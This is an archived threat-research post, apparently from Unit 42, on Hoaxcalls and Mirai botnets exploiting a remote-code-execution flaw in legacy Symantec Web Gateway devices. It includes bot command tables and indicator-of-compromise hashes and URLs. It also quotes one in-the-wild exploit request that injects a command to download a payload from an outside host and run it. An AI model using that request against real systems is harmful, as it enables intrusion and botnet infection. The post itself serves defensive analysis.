{
	"id": "9c58382e-ec5f-4529-b5ad-1520cedd6c86",
	"created_at": "2026-04-06T00:13:00.194125Z",
	"updated_at": "2026-04-10T03:30:57.315375Z",
	"deleted_at": null,
	"sha1_hash": "5aa40a1cbcb07425aa94d8e2774aa52d8103cb5c",
	"title": "Mirai and Hoaxcalls Botnets Target Legacy Symantec Web Gateways",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 96738,
	"plain_text": "Mirai and Hoaxcalls Botnets Target Legacy Symantec Web Gateways\r\nBy Ruchna Nigam\r\nPublished: 2020-05-14 · Archived: 2026-04-05 19:44:30 UTC\r\nExecutive Summary\r\nAs part of Unit 42’s efforts to proactively monitor threats circulating in the wild, I recently came across new Hoaxcalls and\r\nMirai botnet campaigns targeting a post-authentication Remote Code Execution vulnerability in Symantec Secure Web\r\nGateway 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019. There\r\nis no evidence to support any other firmware versions are vulnerable at this point in time and these findings have been\r\nshared with Symantec.  They confirmed the currently exploited vulnerability is no longer present in Symantec Web Gateway\r\n5.2.8.  Symantec also wanted to emphasize the point that this vulnerability does not impact Secure Web Gateway solutions,\r\nincluding ProxySG and Web Security Services.\r\nThe first instance of this vulnerability being exploited surfaced on April 24th, 2020 as part of an evolution of the Hoaxcalls\r\nbotnet that was first discovered earlier that same month. This latest version of Hoaxcalls supports additional commands that\r\nallow an attacker greater control on the infected devices, such as the possibility to proxy traffic through them, downloading\r\nupdates, maintaining persistence across device restarts, or preventing reboots, and a larger number of DDoS attacks that can\r\nbe launched. The use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details,\r\nhighlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new\r\nexploits as and when they are made public.\r\nFollowing that, in the first week of May, I also came across a Mirai variant campaign involving the use of the same exploit,\r\nthough in this campaign, the samples themselves don’t contain any DDoS capabilities. Instead, they serve the purpose of\r\npropagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability This blog\r\npost provides any noteworthy technical details on these two campaigns.\r\nPalo Alto Networks customers are protected from this attack: WildFire correctly identifies all related samples as malicious\r\nand Threat Prevention blocks all exploits used by this variant. In addition, AutoFocus customers can track this exploit using\r\nthe tag SymantecWebGateway_RCE.\r\nHoaxcalls Evolution\r\nThe Hoaxcalls botnet, an offshoot of the Bashlite/Gafgyt malware family, was first discovered in April 2020, exploiting\r\nrecently disclosed vulnerabilities in certain models of Grandstream business telephone IP PBX systems, and Draytek Vigor\r\nrouters.\r\nA few weeks later, the botnet was found exploiting an unpatched vulnerability impacting Zyxel Cloud CNM SecuManager.\r\nOn April 24th, I observed samples of the same botnet incorporating an exploit targeting the EOL’d Symantec Secure Web\r\nGateway v5.0.2.8, with an HTTP request in the format:\r\nPOST /spywall/timeConfig.php HTTP/1.1\r\nUser-Agent: XTC\r\nposttime=1585228657\u0026saveForm=Save\u0026timesync=1\u0026ntpserver=http://qweqwe.com;$(wget%20http://plexle.us/Th5xrRAm%20-\r\nO%20/tmp/viktor%20\u0026\u0026%20chmod%20777%20/tmp/viktor%20\u0026\u0026%20/tmp/viktor);#\u0026timezone=5\r\nAs seen in the snippet above, some samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted.\r\nhttps://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/\r\nPage 1 of 6\n\nA comprehensive list of indicators of compromise (IOCs), along with a timeline of this activity can be found at the end of\r\nthis post.\r\nWhile the new version of the Hoaxcalls botnet is very similar to the initial version, to the point that it even uses the same\r\nencryption scheme with the exact same keys, it supports additional commands that allow an attacker greater control on the\r\ninfected devices such as the possibility to proxy traffic through them, downloading updates, maintaining persistence across\r\ndevice restarts or preventing reboots, and a larger number of DDoS attacks that can be launched. These have been detailed\r\nbelow.\r\nFlooder\r\nCommands\r\nDescription\r\nSYMANTEC scan and infect Symantec Secure Web Gateway devices using the RCE described just above.\r\nFASTFLUX proxy traffic from the device to an address specified by the attacker\r\nUNINSTALL kill the running malware process\r\nKILLTELNET\r\nkill the telnet service on the device (this is probably to make maintenance of an infected device\r\ntrickier for administrators)\r\nLOCKDEVICE setup a cronjob to ensure the binary is running and maintain persistence across device restarts\r\nUPDATE\r\ndelete the existing bot binary, and download an update from 164[.]132.92.180/sh using either\r\nwget or tftp (The update URL was serving a script as seen in Fig 1 below)\r\nMOVE switch IRC server\r\nIOCTL disable the watchdog timer to prevent reboots\r\nHTTPCONN launch HTTP CONNECTION request flood against specified target\r\nHTTPOPTIONS launch HTTP OPTIONS request flood against specified target\r\nHTTPTRACE launch HTTP TRACE request flood against specified target\r\nHTTPDELETE launch HTTP DELETE request flood against specified target\r\nHTTPPUT launch HTTP PUT request flood against specified target\r\nHTTPPOST launch HTTP POST request flood against specified target\r\nHTTPHEAD launch HTTP HEAD request flood against specified target\r\nHTTPGET launch HTTP GET request flood against specified target\r\nURG launch URG flood against specified target\r\nPSH launch PSH flood against specified target\r\nACK launch ACK flood against specified target\r\nFIN launch FIN flood against specified target\r\nRST launch RST flood against specified target\r\nSYN launch SYN flood against specified target\r\nTCP launch TCP flood against specified target\r\nhttps://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/\r\nPage 2 of 6\n\nVSE launch VSE flood against specified target\r\nTable 1. New Flooder commands\r\nThe URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.\r\nFig 1. Hoaxcalls update URL\r\nOther bot and flooder commands in common with the previous version of the Hoaxcalls botnet have been described in detail\r\npreviously.\r\nMirai Variant\r\nSamples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of\r\nUPX by using a different 4-byte key with the UPX algorithm.\r\nAnother deviation from the Mirai source-code is the use of all of ten 8-byte keys that are cumulatively used for a byte-wise\r\nstring encryption scheme.\r\n     0xDEADBEEF, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF,\r\n0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF\r\nThis is similar to the scheme used by the Hoaxcalls botnet, and has been seen used in previous variants too. However, as has\r\nbeen clear with previous implementations too, the use of multiple keys does not imply greater encryption complexity, and in\r\nthis case this essentially amounts to a byte-wise XOR encryption with 0x5a.\r\nIn this campaign, the samples themselves don’t contain any DDoS capabilities, but rather serve the purpose of propagation\r\nusing credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability.\r\nSpeculation on Exploitation Success\r\nIt is worth mentioning that the botnets’ success at exploitation and infection is limited by the following two facts:\r\n1. The Symantec Secure Web Gateway RCE vulnerability being exploited is a post-authentication vulnerability\r\nimplying the exploit is only effective for authenticated sessions.\r\n2. The devices being targeted are EOLDproducts from 2012, and installations with newer firmware would not be\r\nvulnerable.\r\nConclusion\r\nIn the case of both campaigns, one can assume that their success with this exploit is limited by the post-authentication nature\r\nof the Symantec Secure Web Gateway RCE vulnerability.\r\nPalo Alto Networks customers are protected by:\r\nhttps://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/\r\nPage 3 of 6\n\nWildFire, which detects all related samples with malicious verdicts\r\nThreat Prevention, which blocks all exploits used by this variant.\r\nThe exploit can be tracked in AutoFocus using the tag SymantecWebGateway_RCE\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers\r\nand to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit\r\nwww.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nFirst\r\nSeen\r\nSHA256 URL\r\n2020-\r\n05-07\r\n1cec4576595048a179bf8c21b58f33ef61ae1825b2b3f0a86915a741a04f253f 45[.]95.168.250/swrgiuhguhwrguiwetu/ar\r\n2020-\r\n05-07\r\na31187ed8545789ff2979037e19e1ca18d35a75820a1ec91053782f30c47ecc5 45[.]95.168.250/swrgiuhguhwrguiwetu/ar\r\n2020-\r\n05-07\r\nef5d39a3fa641b4d55d870437a9ba774eefcfa2c69066dd0a6fbe513a4b7a8f2 45[.]95.168.250/swrgiuhguhwrguiwetu/ar\r\n2020-\r\n05-07\r\n04e8356bdc8782cf03acc9f69ff6fa9dfde7378dcd1fe0dc737d13fd4d7e061e 45[.]95.168.250/swrgiuhguhwrguiwetu/ar\r\n2020-\r\n05-07\r\n60f755288c9d3110d2fe5d872b2c045156dcea4be9a5cc918bddf1e786881842 45[.]95.168.250/swrgiuhguhwrguiwetu/m\r\n2020-\r\n05-07\r\n0e531e105aa3419cd19e95fa9d44f6176157002a09444a1e5465657d743180ac 45[.]95.168.250/swrgiuhguhwrguiwetu/m\r\n2020-\r\n05-07\r\n02dc186a39607475838bb4859f89e7a200f74fed41400ab5db4eb42d3f58f772 45[.]95.168.250/swrgiuhguhwrguiwetu/m\r\n2020-\r\n05-07\r\n72675ccf2d4e0d0aac2f5121a6a80ea1efc4f30b22e64b07bd891438de2bf82a 45[.]95.168.250/swrgiuhguhwrguiwetu/pp\r\n2020-\r\n05-07\r\n0a48cc158a07e13bd76ac941c4523692530f836d69256b02a10052248263d781 45[.]95.168.250/swrgiuhguhwrguiwetu/sh\r\n2020-\r\n05-07\r\n37dfde696632295e806924de3d3ab751404e2a968e063a12ce72eb2e3ce0b984 45[.]95.168.250/swrgiuhguhwrguiwetu/x\r\n2020-\r\n05-02\r\nda84fd43cb8701c4e23dd0a4175ebccebda026ca2f47b7b1bad393205075389f 164[.]132.92.180/arm4\r\n2020-\r\n05-02\r\n287645a5a29a39ef94aa0cdebdbd3cb4ad2a45ead8894fc323a5a2a76a7fdb0d 164[.]132.92.180/arm5\r\n2020-\r\n05-02\r\n4a4316178e85e0d4c94d74af9f2258c045194cf7a4f4a83a90abf5db09fbaa04 164[.]132.92.180/i586\r\n2020-\r\n05-02\r\n38290965b2cd8048b3ef076487b99dfbeef457f6f6f9998b95ff922e160a5113 164[.]132.92.180/i486\r\nhttps://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/\r\nPage 4 of 6\n\n2020-\r\n05-02\r\n25d1c51135dca20f4f7a720f237d9186edde2a2a664ede6bef37e843e7be409c 164[.]132.92.180/i686\r\n2020-\r\n05-02\r\n012d49c6e847f2f75983b46a9a1310dac29b5f8d30b665ae2124d8619b80753b 164[.]132.92.180/m68k\r\n2020-\r\n05-02\r\n763dfa5f391d27e65be6682c2e58c888df309fa2732781db312f5c9b10e6d5a1 164[.]132.92.180/mips\r\n2020-\r\n05-02\r\nad1156e6ad91b02f225d82d96000cf9abf671a305e8c5c61229d69dbed5050ba 164[.]132.92.180/mips64\r\n2020-\r\n05-02\r\n28f31eb4b1fd3b7e742f5043a26b383585317d16bbfdae0296e18b90dcbec29b 164[.]132.92.180/ppc440\r\n2020-\r\n05-02\r\n5d8756118b7e017eb4f4c5da4236191b20a5c8cb96abb76c26f0e918a76bd973 164[.]132.92.180/mpsl\r\n2020-\r\n05-02\r\n1f64287ae9ea968017b3615f2b5b51932d7eeb3f0ee6621f74ae29af8f1a27d5 164[.]132.92.180/sh4\r\n2020-\r\n05-02\r\n65a8ea32f77c2d18325d49d0cc32a4bbf893a2f106e77e8a8670191c71b456a9 164[.]132.92.180/spc\r\n2020-\r\n05-02\r\n2b0854d40d8ffdca886f4540156b7addc4245de5df197e39ce198b9cf098944a 164[.]132.92.180/arm6\r\n2020-\r\n05-02\r\n43ce5e4fb95b57fa2921d718e989107a594d5287b5bbbcb3e9bff262a982e815 164[.]132.92.180/ppc\r\n2020-\r\n05-02\r\n3d6be7b9bd4798000230e354a5777601ca6672c8d84af842469ddeb1681ed7f2 164[.]132.92.180/arm7\r\n2020-\r\n05-02\r\ne0141934100df75d6b0c61858fc4cc44f97ce2a2588aa5d042f965f9542b843b 164[.]132.92.180/x86\r\n2020-\r\n05-01\r\n85f397e052950f736b32f0463dce7a1458ed034bec57284ea83d2ee4788f8a82 164[.]132.92.180/x86\r\n2020-\r\n05-01\r\nb39763036951bb373e1389362c4de6c4cbd3af3757dbb66d53fceb69de02677f 164[.]132.92.180/arm7\r\n2020-\r\n05-01\r\n6d76fd0bb5ba2d1c19f64288bb4b20eb136171aa8ea1afb685d2e363911aab2f 164[.]132.92.180/arm6\r\n2020-\r\n05-01\r\n5415ce3e759bcc3a8a163a84b64a7185f6540d4ec0ff07627ac770fd0ef0244d 164[.]132.92.180/arm5\r\n2020-\r\n05-01\r\nb52f8ff49e172a3e41ec60010c4089e3534ad1f0582a7ee04c4aa58c34db21ca 164[.]132.92.180/arm4\r\n2020-\r\n05-01\r\ne248445c39cac693fc2a921e41879fb80286f418c352d7a9d428d6181fe113a3 164[.]132.92.180/mpsl\r\n2020-\r\n05-01\r\na3e2d3536d3facd3d825949addd7e99152b5df395b26e41e04b16be0a8cf4d85 164[.]132.92.180/mips\r\nhttps://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/\r\nPage 5 of 6\n\n2020-\r\n04-27\r\n82e5e0f6c130a3f0424cf33468f5ec7a3a66d14f5d346196d1b604ecd2b1e6a3 164[.]132.92.180/x86\r\n2020-\r\n04-27\r\nfa1bc69c9eccaaa4b8131856f9e69837f10dfa1236a65e0a8954d297c2a465bd 164[.]132.92.180/arm4\r\n2020-\r\n04-26\r\n233d4f6ee9f0ffb52b88de0218a0a4b04e3b20c5440e6414255d644ef696d190\r\n2020-\r\n04-24\r\n81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee plexle[.]us/Th5xrRAm\r\n2020-\r\n04-24\r\ne15eeeaeb0ac0639bf3491ba8801e30516e085047f2d787397966065bdf9d5e7\r\n2020-\r\n04-24\r\n5916171938fba2d218de38c8b1f484345bc62d436b7b501ef986ae06c133b13d\r\n2020-\r\n04-24\r\n970496ac754ce7573216950a9904bdfc75574b4c0605e1d62364be799b9c813b\r\n2020-\r\n04-24\r\n735beaa92e7d697a521c7ed5292b3e8100c29a2af88f1a1b99abf0a1bc5ab5c8 164[.]132.92.180/i686\r\n2020-\r\n04-24\r\n84e017a59f9f7d7d5fde40bc2867a1e9d6ec6fae63b3e21685b3bb7166357531 164[.]132.92.180/arm7\r\n2020-\r\n04-24\r\n81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee\r\n2020-\r\n04-24\r\n9ce642628cec8de80d2186d5d7f020635180326ed9e33cabde46d6c9b2caba1b\r\n2020-\r\n04-24\r\n20c3f1bbf4ae4733c6e01eb4f82a251bcb5b0ae0bd5f1b1a028b7ff65ea779af\r\n2020-\r\n04-24\r\nddab987e986f76fcc36af92a6ea15439dd36253d91c0c3cddd77b2b9fd9ff395\r\n2020-\r\n04-24\r\n7bca6fcc70d14253803780e80ee57b29814adeae1af993374f919a1017f5b0f5\r\nSource: https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/\r\nhttps://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/"
	],
	"report_names": [
		"hoaxcalls-mirai-target-legacy-symantec-web-gateways"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434380,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5aa40a1cbcb07425aa94d8e2774aa52d8103cb5c.pdf",
		"text": "https://archive.orkl.eu/5aa40a1cbcb07425aa94d8e2774aa52d8103cb5c.txt",
		"img": "https://archive.orkl.eu/5aa40a1cbcb07425aa94d8e2774aa52d8103cb5c.jpg"
	}
}